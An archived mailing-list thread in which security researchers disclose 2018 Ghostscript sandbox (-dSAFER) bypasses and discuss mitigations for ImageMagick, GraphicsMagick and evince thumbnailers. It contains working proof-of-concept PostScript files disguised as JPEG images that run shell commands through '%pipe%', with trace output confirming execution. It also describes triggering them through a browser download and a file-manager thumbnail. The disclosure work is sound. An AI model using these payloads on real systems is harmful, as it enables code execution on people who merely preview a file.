http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=b575e1ec42
# 699668 - .definemodifiedfont memory corruption if /typecheck is handled
CVE-2018-16542
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5b5536fa88a9e885032bc0df3852c3439399a5c0
# 699670 gssetresolution memory corruption
CVE-2018-16543
Post by Tavis Ormandy
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671 handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699676 PDF interpreter can leave dangerous operators available
As its the same commit, I assume it is also covered by CVE-2018-16510 from bug 699671?

I have not yet requested the current issue(s) you spotted.

Ciao, Marcus
Tavis Ormandy
2018-08-23 00:35:11 UTC
Permalink
Thanks Amit, that's scary, it looks like they're working on it right now.

FWIW, I figured out how to reproduce the original bug here in
evince-thumbnailer:

$ cat test.jpeg
%!PS
a0
{ null restore } stopped { pop } if
(ppmraw) selectdevice
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
$ strace -q -feexecve evince-thumbnailer test.jpeg foo.out
execve("/usr/bin/evince-thumbnailer", ["evince-thumbnailer", "test.jpeg",
"foo.out"], 0x7ffeed3010d0 /* 65 vars */) = 0
execve("/bin/sh", ["sh", "-c", "id"], 0x7ffcf3ea8d18 /* 65 vars */) = 0

Tavis.
Post by AmitB
I also took a look a copule weeks ago at few of the patches for your
previous bugs from 2 years ago, and found that one of them is incomplete
and still allowing RCE (
https://bugs.ghostscript.com/show_bug.cgi?id=697178)
------------------
$ cat poc.jpg
%!PS
<< (ICCProfilesDir) (%pipe%id > /dev/) >> .setuserparams
currentdevice null true mark /OutputICCProfile (tty)
.putdeviceparams
showpage
$ identify poc.jpg
uid=1000(amit) gid=1000(amit) groups=1000(amit)
After reviewing all of the comments in the original bug report I saw that
you actually mentioned this issue, but it was not taken under
consideration/forgotten for some reason.
So effectively a public RCE PoC has been avaliable for GhostScript for
almost 2 years.
699623 Incomplete fix for #697178 Allowing -dSAFER bypass
But I got no response from them until today.
If you have others channels of contact with them please let them know about
this one too.
Post by Tavis Ormandy
Thanks Alex.
FWIW, not all of these are visible, but I've started filing bugs, I'll
file
Post by Tavis Ormandy
a few more today and then let the developers work through the most
serious
Post by Tavis Ormandy
ones.
699654 /invalidaccess checks stop working after a failed restore
699655 missing type checking in setcolor
699656 LockDistillerParams boolean missing type checks
699659 missing type check in type checker (!)
699657 .tempfile SAFER restrictions seem to be broken
699658 Bypassing PermitFileReading by handling undefinedfilename error
699660 shading_param incomplete type checking
699661 pdf14 garbage collection memory corruption
699662 calling .bindnow causes sideeffects
699663 .setdistillerkeys memory corruption
699664 corrupt device object after error in job
I'm working on getting reproducers working for the developers for all
bugs.
Post by Tavis Ormandy
Post by Alex Gaynor
A small note. Both ImageMagick and GraphicsMagick process various file
formats that can nest a different image file inside of them. These are
very
Post by Alex Gaynor
frequently implemented with a call to ReadImage(), with no checking
that
Post by Tavis Ormandy
Post by Alex Gaynor
it's the expected file format. (As a result, the fuzzer finds various
impressive chains, with sometimes 3 different image formats nested
inside
Post by Tavis Ormandy
Post by Alex Gaynor
of each other).
The conclusion of this is that people _must not_ attempt to do their
own
Post by Tavis Ormandy
Post by Alex Gaynor
format detection and then pass the data to IM/GM, because this can be
bypassed with nested formats. It's imperative that GS truly be disabled
with either policy.xml or by uninstall GS.
Alex
On Tue, Aug 21, 2018 at 11:01 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Tavis Ormandy
I think those thumbnails should be disabled, but you've probably
noticed
Post by Bob Friesenhahn
I
Post by Tavis Ormandy
think everything related to untrusted ghostscript should be
disabled
Post by Tavis Ormandy
Post by Alex Gaynor
:-)
Post by Bob Friesenhahn
I have posted to the GraphicsMagick Announcements mailing list
regarding your findings (with a link to this list) and suggested that
a fool-proof solution is that Ghostscript should be uninstalled.
Uninstalling Ghostscript entirely might cause software using libgs to
not execute at all unless a stub library is put in its place.
Dependencies on Ghostscript are much larger than one would initially
think due to Postscript being the traditional output from Unix
software for "printing" and thus it is used as an intermediate format
in order to convert between formats. EPS content is also embedded in
some other formats.
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
Post by Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
All that is necessary for evil to succeed is for good people to do
nothing.
Tavis Ormandy
2018-08-23 01:57:06 UTC
Permalink
FWIW, I just pinged a contact to check that bug.

Putting the two ICC components together like that is clever, I knew about
the two bugs independently but it hadn't clicked they could be chained
together. Nice.
Post by Tavis Ormandy
Thanks Amit, that's scary, it looks like they're working on it right now.
FWIW, I figured out how to reproduce the original bug here in
$ cat test.jpeg
%!PS
a0
{ null restore } stopped { pop } if
(ppmraw) selectdevice
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
$ strace -q -feexecve evince-thumbnailer test.jpeg foo.out
execve("/usr/bin/evince-thumbnailer", ["evince-thumbnailer", "test.jpeg",
"foo.out"], 0x7ffeed3010d0 /* 65 vars */) = 0
execve("/bin/sh", ["sh", "-c", "id"], 0x7ffcf3ea8d18 /* 65 vars */) = 0
Tavis.
Post by AmitB
I also took a look a copule weeks ago at few of the patches for your
previous bugs from 2 years ago, and found that one of them is incomplete
and still allowing RCE (
https://bugs.ghostscript.com/show_bug.cgi?id=697178)
------------------
$ cat poc.jpg
%!PS
<< (ICCProfilesDir) (%pipe%id > /dev/) >> .setuserparams
currentdevice null true mark /OutputICCProfile (tty)
.putdeviceparams
showpage
$ identify poc.jpg
uid=1000(amit) gid=1000(amit) groups=1000(amit)
After reviewing all of the comments in the original bug report I saw that
you actually mentioned this issue, but it was not taken under
consideration/forgotten for some reason.
So effectively a public RCE PoC has been avaliable for GhostScript for
almost 2 years.
699623 Incomplete fix for #697178 Allowing -dSAFER bypass
But I got no response from them until today.
If you have others channels of contact with them please let them know about
this one too.
Post by Tavis Ormandy
Thanks Alex.
FWIW, not all of these are visible, but I've started filing bugs, I'll
file
Post by Tavis Ormandy
a few more today and then let the developers work through the most
serious
Post by Tavis Ormandy
ones.
699654 /invalidaccess checks stop working after a failed restore
699655 missing type checking in setcolor
699656 LockDistillerParams boolean missing type checks
699659 missing type check in type checker (!)
699657 .tempfile SAFER restrictions seem to be broken
699658 Bypassing PermitFileReading by handling undefinedfilename error
699660 shading_param incomplete type checking
699661 pdf14 garbage collection memory corruption
699662 calling .bindnow causes sideeffects
699663 .setdistillerkeys memory corruption
699664 corrupt device object after error in job
I'm working on getting reproducers working for the developers for all
bugs.
Post by Tavis Ormandy
Post by Alex Gaynor
A small note. Both ImageMagick and GraphicsMagick process various file
formats that can nest a different image file inside of them. These are
very
Post by Alex Gaynor
frequently implemented with a call to ReadImage(), with no checking
that
Post by Tavis Ormandy
Post by Alex Gaynor
it's the expected file format. (As a result, the fuzzer finds various
impressive chains, with sometimes 3 different image formats nested
inside
Post by Tavis Ormandy
Post by Alex Gaynor
of each other).
The conclusion of this is that people _must not_ attempt to do their
own
Post by Tavis Ormandy
Post by Alex Gaynor
format detection and then pass the data to IM/GM, because this can be
bypassed with nested formats. It's imperative that GS truly be
disabled
Post by Tavis Ormandy
Post by Alex Gaynor
with either policy.xml or by uninstall GS.
Alex
On Tue, Aug 21, 2018 at 11:01 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Tavis Ormandy
I think those thumbnails should be disabled, but you've probably
noticed
Post by Bob Friesenhahn
I
Post by Tavis Ormandy
think everything related to untrusted ghostscript should be
disabled
Post by Tavis Ormandy
Post by Alex Gaynor
:-)
Post by Bob Friesenhahn
I have posted to the GraphicsMagick Announcements mailing list
regarding your findings (with a link to this list) and suggested
that
Post by Tavis Ormandy
Post by Alex Gaynor
Post by Bob Friesenhahn
a fool-proof solution is that Ghostscript should be uninstalled.
Uninstalling Ghostscript entirely might cause software using libgs
to
Post by Tavis Ormandy
Post by Alex Gaynor
Post by Bob Friesenhahn
not execute at all unless a stub library is put in its place.
Dependencies on Ghostscript are much larger than one would initially
think due to Postscript being the traditional output from Unix
software for "printing" and thus it is used as an intermediate
format
Post by Tavis Ormandy
Post by Alex Gaynor
Post by Bob Friesenhahn
in order to convert between formats. EPS content is also embedded
in
Post by Tavis Ormandy
Post by Alex Gaynor
Post by Bob Friesenhahn
some other formats.
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
Post by Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
All that is necessary for evil to succeed is for good people to do
nothing.
Tavis Ormandy
2018-08-23 04:24:36 UTC
Permalink
I've verified that on centos7 at least, just opening nautilus on Downloads
is enough to trigger code execution via evince-thumbnailer.

I just called it test.tiff and used <a download href=test.tiff> in Chrome,
opening nautilus executed the command immediately.

I think we should kill (or at least trim the mime types)
in /usr/share/thumbnailers/evince.thumbnailer.

Tavis.
Post by Tavis Ormandy
Thanks Amit, that's scary, it looks like they're working on it right now.
FWIW, I figured out how to reproduce the original bug here in
$ cat test.jpeg
%!PS
a0
{ null restore } stopped { pop } if
(ppmraw) selectdevice
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
$ strace -q -feexecve evince-thumbnailer test.jpeg foo.out
execve("/usr/bin/evince-thumbnailer", ["evince-thumbnailer", "test.jpeg",
"foo.out"], 0x7ffeed3010d0 /* 65 vars */) = 0
execve("/bin/sh", ["sh", "-c", "id"], 0x7ffcf3ea8d18 /* 65 vars */) = 0
Tavis.
Post by AmitB
I also took a look a copule weeks ago at few of the patches for your
previous bugs from 2 years ago, and found that one of them is incomplete
and still allowing RCE (
https://bugs.ghostscript.com/show_bug.cgi?id=697178)
------------------
$ cat poc.jpg
%!PS
<< (ICCProfilesDir) (%pipe%id > /dev/) >> .setuserparams
currentdevice null true mark /OutputICCProfile (tty)
.putdeviceparams
showpage
$ identify poc.jpg
uid=1000(amit) gid=1000(amit) groups=1000(amit)
After reviewing all of the comments in the original bug report I saw that
you actually mentioned this issue, but it was not taken under
consideration/forgotten for some reason.
So effectively a public RCE PoC has been avaliable for GhostScript for
almost 2 years.
699623 Incomplete fix for #697178 Allowing -dSAFER bypass
But I got no response from them until today.
If you have others channels of contact with them please let them know about
this one too.
Post by Tavis Ormandy
Thanks Alex.
FWIW, not all of these are visible, but I've started filing bugs, I'll
file
Post by Tavis Ormandy
a few more today and then let the developers work through the most
serious
Post by Tavis Ormandy
ones.
699654 /invalidaccess checks stop working after a failed restore
699655 missing type checking in setcolor
699656 LockDistillerParams boolean missing type checks
699659 missing type check in type checker (!)
699657 .tempfile SAFER restrictions seem to be broken
699658 Bypassing PermitFileReading by handling undefinedfilename error
699660 shading_param incomplete type checking
699661 pdf14 garbage collection memory corruption
699662 calling .bindnow causes sideeffects
699663 .setdistillerkeys memory corruption
699664 corrupt device object after error in job
I'm working on getting reproducers working for the developers for all
bugs.
Post by Tavis Ormandy
Post by Alex Gaynor
A small note. Both ImageMagick and GraphicsMagick process various file
formats that can nest a different image file inside of them. These are
very
Post by Alex Gaynor
frequently implemented with a call to ReadImage(), with no checking
that
Post by Tavis Ormandy
Post by Alex Gaynor
it's the expected file format. (As a result, the fuzzer finds various
impressive chains, with sometimes 3 different image formats nested
inside
Post by Tavis Ormandy
Post by Alex Gaynor
of each other).
The conclusion of this is that people _must not_ attempt to do their
own
Post by Tavis Ormandy
Post by Alex Gaynor
format detection and then pass the data to IM/GM, because this can be
bypassed with nested formats. It's imperative that GS truly be
disabled
Post by Tavis Ormandy
Post by Alex Gaynor
with either policy.xml or by uninstall GS.
Alex
On Tue, Aug 21, 2018 at 11:01 AM Bob Friesenhahn <
Post by Bob Friesenhahn
Post by Tavis Ormandy
I think those thumbnails should be disabled, but you've probably
noticed
Post by Bob Friesenhahn
I
Post by Tavis Ormandy
think everything related to untrusted ghostscript should be
disabled
Post by Tavis Ormandy
Post by Alex Gaynor
:-)
Post by Bob Friesenhahn
I have posted to the GraphicsMagick Announcements mailing list
regarding your findings (with a link to this list) and suggested
that
Post by Tavis Ormandy
Post by Alex Gaynor
Post by Bob Friesenhahn
a fool-proof solution is that Ghostscript should be uninstalled.
Uninstalling Ghostscript entirely might cause software using libgs
to
Post by Tavis Ormandy
Post by Alex Gaynor
Post by Bob Friesenhahn
not execute at all unless a stub library is put in its place.
Dependencies on Ghostscript are much larger than one would initially
think due to Postscript being the traditional output from Unix
software for "printing" and thus it is used as an intermediate
format
Post by Tavis Ormandy
Post by Alex Gaynor
Post by Bob Friesenhahn
in order to convert between formats. EPS content is also embedded
in
Post by Tavis Ormandy
Post by Alex Gaynor
Post by Bob Friesenhahn
some other formats.
Bob
--
Bob Friesenhahn
http://www.simplesystems.org/users/bfriesen/
Post by Bob Friesenhahn
GraphicsMagick Maintainer, http://www.GraphicsMagick.org/
--
All that is necessary for evil to succeed is for good people to do
nothing.
Florian Weimer
2018-08-23 06:12:52 UTC
Permalink
Post by Tavis Ormandy
I think we should kill (or at least trim the mime types)
in /usr/share/thumbnailers/evince.thumbnailer.
Note that this may or may not work, depending on whether the MIME type
detection is identical between the selection of the evince and the
selection of the Ghostscript backend in evince itself.

I remember a case from several years ago where an ImageMagick bug was
still exploitable via mail user agents even though the problematic image
format was not listed in /etc/mailcap. ImageMagick did its own format
detection back then, so all you had to do was to change the file extension.

Thanks,
Florian
Continue reading on narkive:
Loading...